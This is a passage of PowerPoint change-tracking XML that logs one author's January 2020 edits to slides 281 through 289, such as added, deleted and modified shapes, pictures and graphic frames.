          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T17:28:47.457" v="9222"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="578362261" sldId="281"/>
            <ac:spMk id="7" creationId="{902A815D-46F4-5943-A72F-03F8D0470AAF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T17:28:44.582" v="9221" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="578362261" sldId="281"/>
            <ac:spMk id="8" creationId="{7806620E-C6D7-BE4F-8861-9159DC37B226}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T17:28:52.185" v="9223"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4213593643" sldId="282"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T17:28:52.185" v="9223"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4213593643" sldId="282"/>
            <ac:spMk id="7" creationId="{902A815D-46F4-5943-A72F-03F8D0470AAF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T19:52:30.791" v="7543" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4213593643" sldId="282"/>
            <ac:picMk id="4" creationId="{6C032F0B-9952-424B-93C8-814D4FC1B625}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T19:53:11.429" v="7700" actId="962"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4213593643" sldId="282"/>
            <ac:picMk id="6" creationId="{A8488FAB-16D3-2A41-ACDB-4E4FA83A2543}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T20:00:52.823" v="8352" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1461211399" sldId="283"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T20:00:52.823" v="8352" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1461211399" sldId="283"/>
            <ac:spMk id="10" creationId="{A9234899-DF7C-2F4E-88C7-F51753148CCB}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T20:00:49.146" v="8351"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1785728580" sldId="284"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T20:01:19.132" v="8396" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1732178478" sldId="285"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T20:01:19.132" v="8396" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1732178478" sldId="285"/>
            <ac:spMk id="10" creationId="{A9234899-DF7C-2F4E-88C7-F51753148CCB}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T17:51:36.597" v="9542"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="455003467" sldId="287"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-07T17:05:49.688" v="9180" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455003467" sldId="287"/>
            <ac:spMk id="16" creationId="{7F99F6D5-36DE-1340-AA4F-8066148780E5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-07T17:05:49.688" v="9180" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455003467" sldId="287"/>
            <ac:spMk id="17" creationId="{401426D7-4EE1-284D-A2E6-88ACB2463CFA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-07T17:05:49.688" v="9180" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455003467" sldId="287"/>
            <ac:spMk id="18" creationId="{8706CE6C-092A-1841-AF12-91DAEECE193C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-07T17:05:49.688" v="9180" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455003467" sldId="287"/>
            <ac:spMk id="19" creationId="{5CBFCABA-DA1A-A84B-B6F0-89DA353D44CC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-07T17:06:10.336" v="9185"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455003467" sldId="287"/>
            <ac:spMk id="30" creationId="{8BA85443-00B2-F04A-8027-B709D65B0931}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-07T17:06:10.336" v="9185"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455003467" sldId="287"/>
            <ac:spMk id="31" creationId="{C3F26354-C4D6-AD4A-8048-D287AF124CC4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-07T17:06:10.336" v="9185"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455003467" sldId="287"/>
            <ac:spMk id="32" creationId="{82A196EF-90DB-D947-A47A-0399939EDA84}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-07T17:06:10.336" v="9185"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455003467" sldId="287"/>
            <ac:spMk id="33" creationId="{17568AFC-E592-3447-93C3-044EBEEF7037}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-07T17:06:10.336" v="9185"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455003467" sldId="287"/>
            <ac:spMk id="34" creationId="{4E36B4FF-6176-B448-AF1A-CD4DA86E03CD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-07T17:06:22.236" v="9187"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455003467" sldId="287"/>
            <ac:spMk id="41" creationId="{555F7140-57A3-474D-97B8-FA69EC67F0CD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-07T17:06:22.236" v="9187"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455003467" sldId="287"/>
            <ac:spMk id="42" creationId="{E7871F28-970D-C34A-A1D6-4086E2ABAC40}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-07T17:06:22.236" v="9187"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455003467" sldId="287"/>
            <ac:spMk id="43" creationId="{A9953CAF-93DD-3D4B-8426-4EBE69C24EB5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-08T20:27:13.562" v="9199" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455003467" sldId="287"/>
            <ac:spMk id="44" creationId="{28CCE08E-BE62-2241-9A1E-5953E7514A22}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-08T20:27:13.562" v="9199" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455003467" sldId="287"/>
            <ac:spMk id="45" creationId="{B094FE6E-7952-C642-8BD7-E2F340743A7D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-08T20:27:14.399" v="9200"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455003467" sldId="287"/>
            <ac:spMk id="46" creationId="{3823D481-C4D8-FB40-890D-CB0CD9DA8B92}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-08T20:27:14.399" v="9200"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455003467" sldId="287"/>
            <ac:spMk id="47" creationId="{E871BB8F-9583-B546-95BE-B288D75E17FC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-07T17:05:49.688" v="9180" actId="478"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455003467" sldId="287"/>
            <ac:grpSpMk id="10" creationId="{A4CF5911-A4F7-4E41-968E-1897A733CC01}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-07T17:05:49.688" v="9180" actId="478"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455003467" sldId="287"/>
            <ac:grpSpMk id="13" creationId="{A711176A-2945-814F-91EE-A9F733805D77}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-07T17:06:10.336" v="9185"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455003467" sldId="287"/>
            <ac:grpSpMk id="21" creationId="{DDC59D9D-CBA9-EB4A-8EA0-847A51E2DF8B}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-07T17:06:10.336" v="9185"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455003467" sldId="287"/>
            <ac:grpSpMk id="24" creationId="{D624AEB6-0430-7448-87E9-CFD25A245177}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-07T17:06:22.236" v="9187"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455003467" sldId="287"/>
            <ac:grpSpMk id="35" creationId="{BFDD368F-A060-BD4F-8E73-B24F54FA4B47}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-07T17:06:22.236" v="9187"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455003467" sldId="287"/>
            <ac:grpSpMk id="38" creationId="{C93137CD-FAB7-ED44-A0B4-091DFE8C32CC}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:graphicFrameChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T17:51:35.905" v="9541" actId="478"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455003467" sldId="287"/>
            <ac:graphicFrameMk id="20" creationId="{F0E7D431-662C-45F5-8EB0-C5691AFEC6D7}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:graphicFrameChg chg="add">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T17:51:36.597" v="9542"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455003467" sldId="287"/>
            <ac:graphicFrameMk id="21" creationId="{8970FBDF-5C4E-6D4B-A4F7-E10FE19FEB88}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-07T17:05:53.970" v="9182" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="455003467" sldId="287"/>
            <ac:picMk id="4" creationId="{4C2DD1C3-49DF-EC46-9280-116DA464240A}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:27:23.176" v="10443"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="747844071" sldId="288"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T20:36:35.608" v="8443" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="747844071" sldId="288"/>
            <ac:spMk id="11" creationId="{75AF7595-9C03-2845-9E6B-BB1035AAE63A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T20:36:35.608" v="8443" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="747844071" sldId="288"/>
            <ac:spMk id="24" creationId="{57E6C803-263C-0946-8DD3-C89F5ACECEB3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T20:36:35.608" v="8443" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="747844071" sldId="288"/>
            <ac:spMk id="26" creationId="{1C0A92BD-C8DF-D948-BDA0-F67840BBBB4B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T20:36:35.608" v="8443" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="747844071" sldId="288"/>
            <ac:spMk id="30" creationId="{FD3F1055-8580-A341-B76B-5B1981AF066F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T20:36:35.608" v="8443" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="747844071" sldId="288"/>
            <ac:spMk id="32" creationId="{F82621CD-73A9-0647-ABA3-3F0C561AEFBD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T20:36:35.608" v="8443" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="747844071" sldId="288"/>
            <ac:spMk id="38" creationId="{5E5D00EB-4369-DC44-B52F-6F0CFAABA050}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T20:36:35.608" v="8443" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="747844071" sldId="288"/>
            <ac:spMk id="39" creationId="{BD1ACC25-5599-034C-825D-3F80CCA4BF24}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T20:36:35.608" v="8443" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="747844071" sldId="288"/>
            <ac:spMk id="42" creationId="{E32EABCF-E11A-7142-B03E-B6D7786F0818}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T20:36:35.608" v="8443" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="747844071" sldId="288"/>
            <ac:spMk id="43" creationId="{B3311883-B29D-7D4E-B530-B83D1E6AE2A8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T20:36:35.608" v="8443" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="747844071" sldId="288"/>
            <ac:spMk id="44" creationId="{DE4D332A-F2AE-F048-BCE1-9692A0890E46}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T20:36:35.608" v="8443" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="747844071" sldId="288"/>
            <ac:spMk id="45" creationId="{6A9ED53E-DF91-8747-81AB-21F840527C13}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T20:36:35.608" v="8443" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="747844071" sldId="288"/>
            <ac:spMk id="48" creationId="{99382E27-F878-D04C-A9A5-913DDBD96D82}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T20:36:35.608" v="8443" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="747844071" sldId="288"/>
            <ac:spMk id="49" creationId="{865CA1D2-28FA-0F45-9492-5923EE2C2354}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T20:36:35.608" v="8443" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="747844071" sldId="288"/>
            <ac:spMk id="50" creationId="{7BF44CA6-D36A-5246-939A-239C4105E231}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:27:22.629" v="10442" actId="478"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="747844071" sldId="288"/>
            <ac:graphicFrameMk id="20" creationId="{F0E7D431-662C-45F5-8EB0-C5691AFEC6D7}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:graphicFrameChg chg="add">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:27:23.176" v="10443"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="747844071" sldId="288"/>
            <ac:graphicFrameMk id="30" creationId="{18EA5AB9-5B69-8B48-88D4-2ABE56F915F3}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:27:29.222" v="10445"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1123375105" sldId="289"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T20:36:43.643" v="8445" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1123375105" sldId="289"/>
            <ac:spMk id="26" creationId="{1C0A92BD-C8DF-D948-BDA0-F67840BBBB4B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T20:36:43.643" v="8445" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1123375105" sldId="289"/>
            <ac:spMk id="45" creationId="{6A9ED53E-DF91-8747-81AB-21F840527C13}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T20:36:43.643" v="8445" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1123375105" sldId="289"/>
            <ac:spMk id="48" creationId="{99382E27-F878-D04C-A9A5-913DDBD96D82}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T20:36:43.643" v="8445" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1123375105" sldId="289"/>
            <ac:spMk id="49" creationId="{865CA1D2-28FA-0F45-9492-5923EE2C2354}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T20:36:43.643" v="8445" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1123375105" sldId="289"/>
            <ac:spMk id="50" creationId="{7BF44CA6-D36A-5246-939A-239C4105E231}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:27:28.971" v="10444" actId="478"/>
          <ac:graphicFrameMkLst>
